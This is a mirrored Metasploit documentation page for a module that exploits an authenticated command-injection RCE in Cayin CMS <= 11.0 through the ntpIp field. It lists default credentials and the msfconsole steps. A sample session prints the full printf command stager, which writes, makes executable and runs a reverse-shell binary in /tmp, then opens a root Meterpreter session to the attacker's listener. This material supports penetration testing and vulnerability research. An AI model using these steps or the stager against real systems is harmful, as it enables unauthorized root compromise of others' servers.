CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/cayin_cms_ntp.md
Views: 1904

Vulnerable Application

This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so repeated requests are made to achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be pretty set and not dynamic between targets. Results in root level access.

With CMS-SE's UI there are several options for NTP server.

  1. Test (this runs the RCE 3 times, thus is exploitable, a different strategy like wget would be required)

  2. Save (saves the data, but doesn't run it)

  3. Update (what was used in this exploit)

Default authentication for the system is administrator:admin from Guide

Verification Steps

  1. Install the application on Ubuntu 16.04

  2. Start msfconsole

  3. Do: exploits/linux/http/cayin_cms_ntp

  4. Do: set rhosts [ip]

  5. Do: run

  6. You should get a root shell.

Options

Scenarios

Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04

[*] Processing cayin_cms.rb for ERB directives.
resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
resource (cayin_cms.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cayin_cms.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (cayin_cms.rb)> set lport 6666
lport => 6666
resource (cayin_cms.rb)> set verbose true
verbose => true
resource (cayin_cms.rb)> check
[+] Cayin CMS install detected
[*] 2.2.2.2:80 - The service is running, but could not be validated.
resource (cayin_cms.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:6666 
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
[*] Command Stager progress -  26.60% done (199/748 bytes)
[*] Command Stager progress -  53.07% done (397/748 bytes)
[*] Command Stager progress -  79.81% done (597/748 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
[*] Command Stager progress - 100.00% done (748/748 bytes)

meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer     : CMS-SE
OS           : Ubuntu 16.04 (Linux 4.4.0-179-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux